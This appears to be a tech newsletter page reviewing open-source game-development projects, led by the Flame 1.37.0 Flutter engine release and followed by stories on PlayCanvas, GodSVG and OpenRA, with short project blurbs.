hbr-mk2 Build a compact all-HF-bands QRP transceiver for CW and SSB with this complete open-source radio that delivers real on-air capability. 70
echomods Prototype ultrasound imaging systems fast with modular open-source signal-processing blocks and Jupyter notebooks that turn raw echoes into usable images. 409
cli Control and script Elgato Stream Decks from the command line or your own tools with this TypeScript CLI built for custom integrations. 50
project_aura Deploy a polished ESP32-S3 air-quality station with LVGL touchscreen UI, MQTT telemetry, and instant Home Assistant integration. 548

Flame 1.37.0 Refines Effects and Collision Systems for Flutter 🔗

Latest release adds HueEffect, overlay controls and rendering optimizations to the mature Dart game engine

flame-engine/flame · Dart · 10.5k stars Est. 2017 · Latest: v1.37.0

The release of Flame v1.37.0 marks another incremental step in the eight-year evolution of the Flutter-based game engine. Rather than chasing headlines, the update delivers targeted fixes and capabilities that address daily friction for developers shipping 2D titles in Dart.

Chief among the changes are the new HueEffect and HueDecorator, which let programmers shift color palettes at runtime without custom shaders or asset duplication. The OverlayManager.setActive() method gives precise control over which UI layers are live during gameplay, simplifying pause menus, HUD transitions and modal interfaces. A new HasAutoBatchedChildren mixin reduces draw-call overhead in scenes containing dozens or hundreds of similar components.

Collision detection receives a subtle but important repair: CollisionProspect now uses proper hash combining, eliminating flaky tests that had plagued continuous integration. Test helpers shed unnecessary async wrappers, speeding up unit tests. Sprite widgets gain an explicit size parameter, making layout calculations more predictable when mixing Flame components with Flutter’s widget tree.

At its foundation, Flame supplies the game-specific building blocks that Flutter itself omits. A deterministic game loop sits at the center. The Flame Component System (FCS) treats every on-screen element as a composable object with its own update and render methods. Built-in systems handle particle effects, nine-slice sprites, sprite-sheet animations, spatial collision grids, gesture input and keyboard controls. These abstractions sit lightly on top of Flutter’s rendering layer, allowing developers to drop back to native widgets for menus or overlays when needed.

Bridge packages extend the core without breaking its philosophy. flame_audio wraps AudioPlayers for concurrent sound effects and music. flame_bloc brings predictable state management to game objects. flame_fire_atlas supplies efficient texture atlasing. The result is an engine that feels both lightweight and complete.

Documentation at docs.flame-engine.org tracks the main branch ahead of releases, while the example gallery lets developers experiment directly in the browser. An active Discord community and well-tagged Stack Overflow channel provide rapid feedback when questions arise.

For teams already committed to Flutter, v1.37.0 removes another layer of boilerplate and sharpens performance in the areas that matter most: rendering batches, color operations and collision reliability. The project’s steady refinement demonstrates that a focused, language-native engine can remain relevant long after its initial launch.

Use Cases
  • Indie studios shipping cross-platform 2D games in Dart
  • Mobile teams integrating Bloc state management with game logic
  • Educators teaching sprite animation and collision concepts
Similar Projects
  • Godot - Full editor and 3D support but requires learning GDScript instead of staying inside Flutter and Dart
  • Unity - Mature 3D engine with C# that demands context-switching away from Flutter’s widget and rendering model
  • Phaser - JavaScript web-focused 2D framework lacking Flame’s native mobile performance and direct widget interoperability

More Stories

PlayCanvas Engine Refines WebGPU Compute in v2.17.2 🔗

Update optimizes workgroup usage while fixing blend and octree issues in graphics pipeline

playcanvas/engine · JavaScript · 14.7k stars Est. 2014

PlayCanvas Engine released v2.17.2 this week, delivering three precision fixes that improve stability and efficiency in its dual WebGL2 and WebGPU backends.

The most consequential change alters Compute.calcDispatchSize to use a y-first approach. This reduces wasted workgroups during compute dispatches, delivering measurable gains for techniques such as 3D Gaussian splatting now supported by the engine. With WebGPU adoption accelerating, the tweak matters for developers pushing real-time 3D in browsers.
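
The underlying idea is easy to sketch. GPU APIs cap how many workgroups a single dispatch dimension may hold, so a large one-dimensional workload must be folded into two dimensions; choosing the row count first keeps the overshoot small. A rough illustration of the concept, not PlayCanvas's actual implementation:

```typescript
// Conceptual sketch only — not the engine's Compute.calcDispatchSize source.
const MAX_DIM = 65535; // typical per-dimension dispatch limit in WebGPU

function dispatchSize2D(numGroups: number): [number, number] {
  if (numGroups <= MAX_DIM) return [numGroups, 1]; // fits in one row
  // Choose the row count (y) first, then derive x, so x * y exceeds
  // numGroups by less than one row instead of by up to MAX_DIM - 1.
  const y = Math.ceil(numGroups / MAX_DIM);
  const x = Math.ceil(numGroups / y);
  return [x, y];
}
```

For 65,536 groups this yields 32,768 × 2 with zero waste, where a naive 65,535 × 2 grid would launch 65,534 idle workgroups.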

Additional corrections address rendering correctness and memory hygiene. Blend state is now properly preserved inside drawQuadWithShader and RenderPassQuad operations, eliminating artifacts in multi-pass effects. The octree system no longer double-decrements file reference counts when entities are disabled, preventing leaks in large streaming scenes that rely on glTF 2.0, Draco, and Basis compression.

The engine supplies a complete runtime: rigid-body physics through ammo.js, state-machine animation, positional audio via the Web Audio API, and full input plus VR controller support through WebXR. Scripts run in TypeScript or JavaScript, with asynchronous asset streaming designed for fast browser load times.

Contributed primarily by core maintainer mvaligursky, the release keeps the 11-year-old project current as teams ship 3D experiences that run without plugins on desktop and mobile.

Use Cases
  • Game studios shipping WebGPU titles directly in browsers
  • Automotive teams building interactive 3D vehicle configurators
  • Agencies creating WebXR advertising and product experiences
Similar Projects
  • Babylon.js - comparable full WebGPU engine with node-based materials
  • Three.js - lower-level rendering library lacking built-in physics
  • A-Frame - declarative VR framework on top of Three.js

GodSVG Refines Real-Time SVG Code Control 🔗

Late-alpha updates improve optimization and web deployment for clean structured editing

MewPurPur/GodSVG · GDScript · 2.4k stars Est. 2023

GodSVG has reached late alpha with measurable improvements to its real-time synchronization between visual canvas and raw SVG markup. Built in GDScript on the Godot engine, the editor treats SVG as structured data rather than a proprietary document format. Edits performed through the interface immediately update the code view, and the exported files contain no added metadata.

This matters now because web and game pipelines increasingly demand minimal, standards-compliant vector assets. GodSVG generates human-readable XML that integrates directly into Godot projects, frontend codebases, or technical documentation without cleanup steps. Optimization tools let users strip unnecessary attributes, shorten path commands, and enforce consistent decimal precision, producing smaller files that render identically across browsers and runtimes.
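
Decimal-precision enforcement, for instance, is a pure text transform. A simplified sketch of the idea (illustrative only, not GodSVG's GDScript implementation):

```typescript
// Illustrative sketch: clamp coordinate precision in SVG path data.
// Real optimizers also rewrite commands and strip attributes; this
// shows only the decimal-rounding step.
function roundPathNumbers(d: string, decimals: number): string {
  return d.replace(/-?\d*\.\d+/g, (n) =>
    String(parseFloat(parseFloat(n).toFixed(decimals)))
  );
}

// roundPathNumbers("M 10.12345 3.999 L 0.10000 2", 2)
// → "M 10.12 4 L 0.1 2"
```

Rounding to two decimals trims trailing digits and zeros while the rendered result stays visually identical at normal zoom levels.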

The application is available on Windows, macOS and Linux, with an official web build at godsvg.com/editor. Experimental Android versions require signature verification using the provided SHA-256 fingerprint. macOS users must bypass Gatekeeper, a limitation the solo developer attributes to distribution costs.

Development remains independent, funded largely by donations. The low-abstraction philosophy delivers precision that high-level design tools often sacrifice for convenience.

Use Cases
  • Godot engineers building precise vector UI elements
  • Web developers optimizing icons for production bundles
  • Technical illustrators authoring clean SVG documentation
Similar Projects
  • Inkscape - adds extensive metadata unlike GodSVG's clean output
  • SVG-Edit - browser tool lacking real-time bidirectional sync
  • Boxy SVG - simpler interface but higher abstraction level

OpenRA's Latest Release Refines Classic RTS Engine 🔗

Release-20250330 enhances compatibility, modding tools and performance for Red Alert and Dune

OpenRA/OpenRA · C# · 16.6k stars Est. 2010

OpenRA has issued release-20250330, delivering incremental upgrades to its C# engine that reimplements the core mechanics of Westwood's Command & Conquer: Red Alert, Tiberian Dawn and Dune 2000. The project, under active development since 2010, continues to provide fully playable, asset-independent versions that run natively on Windows, Linux, *BSD and macOS.

The update improves SDL and OpenGL handling for better high-DPI support and Apple Silicon performance, addressing compatibility issues that arise on newer distributions and kernels. Modders now benefit from expanded trait documentation and more robust YAML parsing for unit behaviors, game rules and AI. The Lua API received refinements that simplify scripted mission triggers and event handling.

Mapping and total conversion workflows remain central. The in-game editor lets users alter gameplay radically through custom rules, while the Mod SDK supplies templates for new factions and mechanics. Maps and mods are distributed via the OpenRA Resource Center; dedicated server binaries allow instant multiplayer hosting.

In an age of subscription-based live-service titles, OpenRA preserves the precise balance and pace of these late-1990s originals. Its GPL-licensed codebase serves as both preservation tool and reference implementation for open game engine design.

Use Cases
  • Linux gamers replaying Red Alert at native resolutions without original discs
  • Modders building total conversions using YAML traits and Lua scripting
  • Developers hosting dedicated multiplayer servers for Tiberian Dawn matches
Similar Projects
  • 0 A.D. - open-source RTS engine focused on historical civilizations and campaigns
  • Spring RTS Engine - community-driven framework for physics-based multiplayer mods
  • OpenTTD - reimplementation of classic transport strategy with expanded networking

Quick Hits

gdUnit4 gdUnit4 embeds a full unit testing framework in Godot 4 for GDScript and C# with mocking, scene testing, assertions, and an integrated inspector. 1k
ZenteonFX ZenteonFX delivers a versatile collection of ReShade shaders that produce striking real-time visual effects and post-processing. 164
MonoGame MonoGame gives developers one efficient C# framework to build high-performance 2D and 3D games that run across platforms. 13.6k
pyxel Pyxel lets Python creators build authentic retro games inside a constrained 8-bit engine with pixel art, sound, and classic controls. 17.4k
Godot-Menus-Template Godot Menus Template instantly adds polished main menus, options, credits, and a robust scene loader to any new project. 420